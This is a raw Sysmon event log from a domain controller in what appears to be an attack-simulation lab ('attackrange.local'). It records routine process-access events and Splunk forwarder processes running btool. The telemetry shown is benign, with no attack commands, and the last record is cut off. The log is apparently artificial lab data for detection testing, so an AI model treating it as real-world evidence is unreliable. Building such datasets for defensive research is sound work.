10341000x80000000000000004701Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.008{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004700Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.008{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004699Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.008{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004698Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.008{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004697Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.008{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CD8-5FA1-ED00-000000008801}4532C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004696Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.008{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004695Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.008{D28789B6-7CD8-5FA1-EC00-000000008801}31601348C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7CD8-5FA1-ED00-000000008801}4532C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004694Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.010{D28789B6-7CD8-5FA1-ED00-000000008801}4532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7CD8-5FA1-EC00-000000008801}3160C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000004693Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CD8-5FA1-EC00-000000008801}3160C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004692Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004691Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004690Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004689Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004688Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004687Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004686Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004685Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004684Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004683Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CD8-5FA1-EC00-000000008801}3160C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004682Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7CD8-5FA1-EB00-000000008801}46124212C:\Windows\system32\cmd.exe{D28789B6-7CD8-5FA1-EC00-000000008801}3160C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004681Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.005{D28789B6-7CD8-5FA1-EC00-000000008801}3160C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7CD8-5FA1-EB00-000000008801}4612C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000004680Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CD8-5FA1-EB00-000000008801}4612C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004679Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004678Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004677Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004676Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004675Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004674Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 